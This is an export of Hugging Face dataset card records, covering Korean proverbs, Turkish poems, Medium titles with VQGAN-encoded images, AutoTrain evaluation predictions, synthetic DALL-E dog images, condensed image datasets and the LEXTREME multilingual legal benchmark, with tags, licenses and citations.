"## 원본 데이터 받기\n우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.\n\n> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.\nURL\n\n우리말샘의 서비스 이용 약관에 따르면\n\n- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.\n- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.\n- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.\n 1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.\n 2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다."
] | [
"TAGS\n#task_categories-text-generation #task_ids-language-modeling #annotations_creators-no-annotation #language_creators-found #multilinguality-monolingual #size_categories-n<1K #source_datasets-original #language-Korean #license-cc-by-2.0 #korean #proverb #region-us \n",
"# 한국어 속담 모음 v1.0\n국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.\n- 현대에 맞지 않는 단어가 포함된 속담 삭제\n- 괄호로 표현된 변형 삭제\n- 중복내용 통합",
"## 원본 데이터 받기\n우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.\n\n> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.\nURL\n\n우리말샘의 서비스 이용 약관에 따르면\n\n- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.\n- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.\n- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.\n 1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.\n 2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다."
] |
9ad3dd427c226e588642000394eae8a394c4c845 | Turkish poems scraped from antoloji.com. Features consist of id, poet name, poem rating, and the poem. A minimal loading sketch follows.
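The column names below are assumptions inferred from the feature description, not documented names:
```python
from datasets import load_dataset

ds = load_dataset("okg/turkish-poems")        # a single default config is assumed
row = ds["train"][0]
print(row["id"], row["poet"], row["rating"])  # hypothetical column names
print(row["poem"][:200])                      # hypothetical column name
```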
| okg/turkish-poems | [
"task_categories:text-generation",
"task_categories:text-classification",
"task_ids:language-modeling",
"task_ids:text-scoring",
"annotations_creators:found",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"language:tr",
"license:unknown",
"region:us"
] | 2022-07-31T09:09:54+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["tr"], "license": ["unknown"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["text-generation", "text-classification"], "task_ids": ["language-modeling", "text-scoring"], "pretty_name": "turkish-poems", "tags": []} | 2022-07-31T09:22:53+00:00 | [] | [
"tr"
] | TAGS
#task_categories-text-generation #task_categories-text-classification #task_ids-language-modeling #task_ids-text-scoring #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #language-Turkish #license-unknown #region-us
| Turkish poems scraped from URL. Features consist of id, poet name, poem rating, and the poem.
| [] | [
"TAGS\n#task_categories-text-generation #task_categories-text-classification #task_ids-language-modeling #task_ids-text-scoring #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #language-Turkish #license-unknown #region-us \n"
] |
4c51ddbf5fdb05d80db8466d2a7eb9253e240dcf | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-a84cddd6-12085614 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-31T11:46:17+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-31T13:34:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
053020686dfa791746f5f3f463e4bc2875ba5ab2 | This dataset contains `<title, encoded_image>` pairs from [Medium](https://medium.com) articles. It was processed from the [Medium Articles Dataset (128k): Metadata + Images](https://www.kaggle.com/datasets/succinctlyai/medium-data) dataset on Kaggle.
The original images were processed in the following way (a minimal code sketch follows the list):
1. Given an image of size `(w, h)`, we cropped a square of size `(n, n)` from the center of the image, where `n = min(w, h)`.
2. The resulting `(n, n)` image was resized to `(256, 256)`.
3. The resulting `(256, 256)` image was encoded into image tokens via the [dalle-mini/vqgan\_imagenet\_f16\_16384](https://huggingface.co/dalle-mini/vqgan_imagenet_f16_16384) model.
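For illustration, steps 1-2 could be implemented with PIL as follows (a sketch; the file path and choice of resampling filter are assumptions, not details taken from the original pipeline):
```python
from PIL import Image

def center_crop_resize(path: str, size: int = 256) -> Image.Image:
    """Steps 1-2: center-crop the largest square, then resize to (size, size)."""
    img = Image.open(path).convert("RGB")
    w, h = img.size
    n = min(w, h)                                   # side of the centered square
    left, top = (w - n) // 2, (h - n) // 2
    img = img.crop((left, top, left + n, top + n))  # (n, n) center crop
    return img.resize((size, size), Image.LANCZOS)

# Step 3 (not shown here): the (256, 256) image is encoded into image tokens
# with the dalle-mini/vqgan_imagenet_f16_16384 model.
```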
Note that this dataset contains ~128k entries and is too small for training a text-to-image model end to end; it is more suitable for operations on a pre-trained model
like [dalle-mini](https://huggingface.co/dalle-mini/dalle-mini) (fine-tuning, [prompt tuning](https://arxiv.org/pdf/2104.08691.pdf), etc.). | succinctly/medium-titles-and-images | [
"license:apache-2.0",
"arxiv:2104.08691",
"region:us"
] | 2022-07-31T16:24:50+00:00 | {"license": "apache-2.0"} | 2022-07-31T16:44:16+00:00 | [
"2104.08691"
] | [] | TAGS
#license-apache-2.0 #arxiv-2104.08691 #region-us
| This dataset contains '<title, encoded_image>' pairs from Medium articles. It was processed from the Medium Articles Dataset (128k): Metadata + Images dataset on Kaggle.
The original images were processed in the following way:
1. Given an image of size '(w, h)', we cropped a square of size '(n, n)' from the center of the image, where 'n = min(w, h)'.
2. The resulting '(n, n)' image was resized to '(256, 256)'.
3. The resulting '(256, 256)' image was encoded into image tokens via the dalle-mini/vqgan\_imagenet\_f16\_16384 model.
Note that this dataset contains ~128k entries and is too small for training a text-to-image model end to end; it is more suitable for operations on a pre-trained model
like dalle-mini (fine-tuning, prompt tuning, etc.). | [] | [
"TAGS\n#license-apache-2.0 #arxiv-2104.08691 #region-us \n"
] |
ba1ab3571cae2263de50e79e0325852a4208ff53 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-samsum-0c52930e-12115616 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-31T23:21:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["samsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "samsum", "dataset_config": "samsum", "dataset_split": "test", "col_mapping": {"text": "dialogue", "target": "summary"}}} | 2022-07-31T23:59:32+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
96ef0d44f0763412ece4a22244a7dbb75aa4e316 |
DALL-E-Dogs is a dataset of synthetic dog images, created as part of an effort to build a synthetic animal dataset. It is a precursor to DALL-E-Cats. DALL-E-Dogs and DALL-E-Cats will be fed into an image classifier to see how it performs. This is under the [BirdL-AirL License](https://huggingface.co/spaces/BirdL/license/). | BirdL/DALL-E-Dogs | [
"task_categories:image-classification",
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-08-01T02:24:18+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["image-classification", "unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Cats Dataset", "tags": []} | 2022-09-28T20:09:11+00:00 | [] | [] | TAGS
#task_categories-image-classification #task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us
|
DALL-E-Dogs is a dataset of synthetic dog images, created as part of an effort to build a synthetic animal dataset. It is a precursor to DALL-E-Cats. DALL-E-Dogs and DALL-E-Cats will be fed into an image classifier to see how it performs. This is under the BirdL-AirL License. | [] | [
"TAGS\n#task_categories-image-classification #task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us \n"
] |
773323193e80d60a61ee816e58e24b7564bbb98c |
### Data summary
- This repository contains small synthetic data for image datasets: MNIST, SVHN, and CIFAR-10.
- Each torch file contains the images and corresponding labels, with 1, 10, or 50 images per class (IPC).
- For more details, please refer to our GitHub page and paper below. A minimal loading sketch is shown after this list.
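As a sketch of how such a file might be read, assuming standard `torch.save` serialization of an `(images, labels)` pair (the file name below is hypothetical; the exact layout is defined in the linked repository):
```python
import torch

# Hypothetical file name; see the GitHub page for the actual naming scheme.
images, labels = torch.load("cifar10_ipc10.pt", map_location="cpu")

print(images.shape)  # e.g. (100, 3, 32, 32) for CIFAR-10 at IPC=10 (10 classes x 10 images)
print(labels.shape)  # e.g. (100,)
# Per the repository metadata, pixel values are floats in the 0-1 range.
```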
### Reference
https://github.com/snu-mllab/Efficient-Dataset-Condensation
### Citation
```
@inproceedings{kimICML22,
title = {Dataset Condensation via Efficient Synthetic-Data Parameterization},
author = {Kim, Jang-Hyun and Kim, Jinuk and Oh, Seong Joon and Yun, Sangdoo and Song, Hwanjun and Jeong, Joonhyun and Ha, Jung-Woo and Song, Hyun Oh},
booktitle = {International Conference on Machine Learning (ICML)},
year = {2022}
}
``` | ICML2022/EfficientDatasetCondensation | [
"license:mit",
"region:us"
] | 2022-08-01T05:53:31+00:00 | {"license": "mit", "data_type": "image (0-1 ranged float)"} | 2022-08-01T06:12:52+00:00 | [] | [] | TAGS
#license-mit #region-us
|
### Data summary
- This repository contains small synthetic data for image datasets: MNIST, SVHN, and CIFAR-10.
- Each torch file contains the images and corresponding labels, with 1, 10, or 50 images per class (IPC).
- For more details, please refer to our GitHub page and paper below.
### Reference
URL
| [
"### Data summary\n- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.\n- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC). \n- For more details, please refer to our GitHub page and paper below.",
"### Reference\nURL"
] | [
"TAGS\n#license-mit #region-us \n",
"### Data summary\n- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.\n- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC). \n- For more details, please refer to our GitHub page and paper below.",
"### Reference\nURL"
] |
8de79b42002a6e7ab7e713787f4c427d122a269f |
# Dataset Card for LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:** [Joel Niklaus](mailto:[email protected])
### Dataset Summary
The dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).
Use the dataset like this:
```python
from datasets import load_dataset
dataset = load_dataset("joelito/lextreme", "swiss_judgment_prediction")
```
### Supported Tasks and Leaderboards
The dataset supports the tasks of text classification and token classification.
In detail, we support the following tasks and configurations:
| task | task type | configurations | link |
|:---------------------------|--------------------------:|---------------------------------:|-------------------------------------------------------------------------------------------------------:|
| Brazilian Court Decisions | Judgment Prediction | (judgment, unanimity) | [joelito/brazilian_court_decisions](https://huggingface.co/datasets/joelito/brazilian_court_decisions) |
| Swiss Judgment Prediction | Judgment Prediction | default | [joelito/swiss_judgment_prediction](https://huggingface.co/datasets/swiss_judgment_prediction) |
| German Argument Mining | Argument Mining | default | [joelito/german_argument_mining](https://huggingface.co/datasets/joelito/german_argument_mining) |
| Greek Legal Code | Topic Classification | (volume, chapter, subject) | [greek_legal_code](https://huggingface.co/datasets/greek_legal_code) |
| Online Terms of Service | Unfairness Classification | (unfairness level, clause topic) | [online_terms_of_service](https://huggingface.co/datasets/joelito/online_terms_of_service) |
| Covid 19 Emergency Event | Event Classification | default | [covid19_emergency_event](https://huggingface.co/datasets/joelito/covid19_emergency_event) |
| MultiEURLEX | Topic Classification | (level 1, level 2, level 3) | [multi_eurlex](https://huggingface.co/datasets/multi_eurlex) |
| LeNER BR | Named Entity Recognition | default | [lener_br](https://huggingface.co/datasets/lener_br) |
| LegalNERo | Named Entity Recognition | default | [legalnero](https://huggingface.co/datasets/joelito/legalnero) |
| Greek Legal NER | Named Entity Recognition | default | [greek_legal_ner](https://huggingface.co/datasets/joelito/greek_legal_ner) |
| MAPA | Named Entity Recognition | (coarse, fine) | [mapa](https://huggingface.co/datasets/joelito/mapa) |
### Languages
The following languages are supported: bg, cs, da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv
## Dataset Structure
### Data Instances
The file format is jsonl and three data splits are present for each configuration (train, validation and test).
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
How can I contribute a dataset to lextreme?
Please follow the following steps:
1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.
2. Create a pull request to the lextreme repository by adding the following to the lextreme.py file:
- Create a dict _{YOUR_DATASET_NAME} (similar to _BRAZILIAN_COURT_DECISIONS_JUDGMENT) containing all the necessary information about your dataset (task_type, input_col, label_col, etc.)
- Add your dataset to the BUILDER_CONFIGS list: `LextremeConfig(name="{your_dataset_name}", **_{YOUR_DATASET_NAME})`
- Test that it works correctly by loading your subset with `load_dataset("lextreme", "{your_dataset_name}")` and inspecting a few examples.
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
```
@misc{niklaus2023lextreme,
title={LEXTREME: A Multi-Lingual and Multi-Task Benchmark for the Legal Domain},
author={Joel Niklaus and Veton Matoshi and Pooja Rani and Andrea Galassi and Matthias Stürmer and Ilias Chalkidis},
year={2023},
eprint={2301.13126},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
### Contributions
Thanks to [@JoelNiklaus](https://github.com/joelniklaus) for adding this dataset.
| joelniklaus/lextreme | [
"task_categories:text-classification",
"task_categories:token-classification",
"task_ids:multi-class-classification",
"task_ids:multi-label-classification",
"task_ids:topic-classification",
"task_ids:named-entity-recognition",
"annotations_creators:other",
"language_creators:found",
"multilinguality:multilingual",
"size_categories:10K<n<100K",
"source_datasets:extended",
"language:bg",
"language:cs",
"language:da",
"language:de",
"language:el",
"language:en",
"language:es",
"language:et",
"language:fi",
"language:fr",
"language:ga",
"language:hr",
"language:hu",
"language:it",
"language:lt",
"language:lv",
"language:mt",
"language:nl",
"language:pl",
"language:pt",
"language:ro",
"language:sk",
"language:sl",
"language:sv",
"license:cc-by-4.0",
"arxiv:2301.13126",
"region:us"
] | 2022-08-01T07:41:55+00:00 | {"annotations_creators": ["other"], "language_creators": ["found"], "language": ["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "ga", "hr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["10K<n<100K"], "source_datasets": ["extended"], "task_categories": ["text-classification", "token-classification"], "task_ids": ["multi-class-classification", "multi-label-classification", "topic-classification", "named-entity-recognition"], "pretty_name": "LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding"} | 2023-04-29T06:02:17+00:00 | [
"2301.13126"
] | [
"bg",
"cs",
"da",
"de",
"el",
"en",
"es",
"et",
"fi",
"fr",
"ga",
"hr",
"hu",
"it",
"lt",
"lv",
"mt",
"nl",
"pl",
"pt",
"ro",
"sk",
"sl",
"sv"
] | TAGS
#task_categories-text-classification #task_categories-token-classification #task_ids-multi-class-classification #task_ids-multi-label-classification #task_ids-topic-classification #task_ids-named-entity-recognition #annotations_creators-other #language_creators-found #multilinguality-multilingual #size_categories-10K<n<100K #source_datasets-extended #language-Bulgarian #language-Czech #language-Danish #language-German #language-Modern Greek (1453-) #language-English #language-Spanish #language-Estonian #language-Finnish #language-French #language-Irish #language-Croatian #language-Hungarian #language-Italian #language-Lithuanian #language-Latvian #language-Maltese #language-Dutch #language-Polish #language-Portuguese #language-Romanian #language-Slovak #language-Slovenian #language-Swedish #license-cc-by-4.0 #arxiv-2301.13126 #region-us
| Dataset Card for LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding
============================================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage:
* Repository:
* Paper:
* Leaderboard:
* Point of Contact: Joel Niklaus
### Dataset Summary
The dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).
Use the dataset like this:
### Supported Tasks and Leaderboards
The dataset supports the tasks of text classification and token classification.
In detail, we support the following tasks and configurations:
### Languages
The following languages are supported: bg, cs, da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv
Dataset Structure
-----------------
### Data Instances
The file format is jsonl and three data splits are present for each configuration (train, validation and test).
### Data Fields
### Data Splits
Dataset Creation
----------------
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
Additional Information
----------------------
How can I contribute a dataset to lextreme?
Please follow these steps:
1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.
2. Create a pull request to the lextreme repository by adding the following to the URL file:
* Create a dict \_{YOUR\_DATASET\_NAME} (similar to \_BRAZILIAN\_COURT\_DECISIONS\_JUDGMENT) containing all the necessary information about your dataset (task\_type, input\_col, label\_col, etc.)
* Add your dataset to the BUILDER\_CONFIGS list: 'LextremeConfig(name="{your\_dataset\_name}", \_{YOUR\_DATASET\_NAME})'
* Test that it works correctly by loading your subset with 'load\_dataset("lextreme", "{your\_dataset\_name}")' and inspecting a few examples.
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @JoelNiklaus for adding this dataset.
| [
"### Dataset Summary\n\n\nThe dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).\n\n\nUse the dataset like this:",
"### Supported Tasks and Leaderboards\n\n\nThe dataset supports the tasks of text classification and token classification.\nIn detail, we support the folliwing tasks and configurations:",
"### Languages\n\n\nThe following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nThe file format is jsonl and three data splits are present for each configuration (train, validation and test).",
"### Data Fields",
"### Data Splits\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------\n\n\nHow can I contribute a dataset to lextreme?\nPlease follow the following steps:\n\n\n1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.\n2. Create a pull request to the lextreme repository by adding the following to the URL file:\n\t* Create a dict \\_{YOUR\\_DATASET\\_NAME} (similar to \\_BRAZILIAN\\_COURT\\_DECISIONS\\_JUDGMENT) containing all the necessary information about your dataset (task\\_type, input\\_col, label\\_col, etc.)\n\t* Add your dataset to the BUILDER\\_CONFIGS list: 'LextremeConfig(name=\"{your\\_dataset\\_name}\", \\_{YOUR\\_DATASET\\_NAME})'\n\t* Test that it works correctly by loading your subset with 'load\\_dataset(\"lextreme\", \"{your\\_dataset\\_name}\")' and inspecting a few examples.",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\n\nThanks to @JoelNiklaus for adding this dataset."
] | [
"TAGS\n#task_categories-text-classification #task_categories-token-classification #task_ids-multi-class-classification #task_ids-multi-label-classification #task_ids-topic-classification #task_ids-named-entity-recognition #annotations_creators-other #language_creators-found #multilinguality-multilingual #size_categories-10K<n<100K #source_datasets-extended #language-Bulgarian #language-Czech #language-Danish #language-German #language-Modern Greek (1453-) #language-English #language-Spanish #language-Estonian #language-Finnish #language-French #language-Irish #language-Croatian #language-Hungarian #language-Italian #language-Lithuanian #language-Latvian #language-Maltese #language-Dutch #language-Polish #language-Portuguese #language-Romanian #language-Slovak #language-Slovenian #language-Swedish #license-cc-by-4.0 #arxiv-2301.13126 #region-us \n",
"### Dataset Summary\n\n\nThe dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).\n\n\nUse the dataset like this:",
"### Supported Tasks and Leaderboards\n\n\nThe dataset supports the tasks of text classification and token classification.\nIn detail, we support the folliwing tasks and configurations:",
"### Languages\n\n\nThe following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nThe file format is jsonl and three data splits are present for each configuration (train, validation and test).",
"### Data Fields",
"### Data Splits\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------\n\n\nHow can I contribute a dataset to lextreme?\nPlease follow the following steps:\n\n\n1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.\n2. Create a pull request to the lextreme repository by adding the following to the URL file:\n\t* Create a dict \\_{YOUR\\_DATASET\\_NAME} (similar to \\_BRAZILIAN\\_COURT\\_DECISIONS\\_JUDGMENT) containing all the necessary information about your dataset (task\\_type, input\\_col, label\\_col, etc.)\n\t* Add your dataset to the BUILDER\\_CONFIGS list: 'LextremeConfig(name=\"{your\\_dataset\\_name}\", \\_{YOUR\\_DATASET\\_NAME})'\n\t* Test that it works correctly by loading your subset with 'load\\_dataset(\"lextreme\", \"{your\\_dataset\\_name}\")' and inspecting a few examples.",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\n\nThanks to @JoelNiklaus for adding this dataset."
] |
6ce1c304556d5f62c1c7ad2378ec3dcbebdd4474 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-samsum-db063b78-12135617 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:22:11+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["samsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "samsum", "dataset_config": "samsum", "dataset_split": "test", "col_mapping": {"text": "dialogue", "target": "summary"}}} | 2022-08-01T08:28:59+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
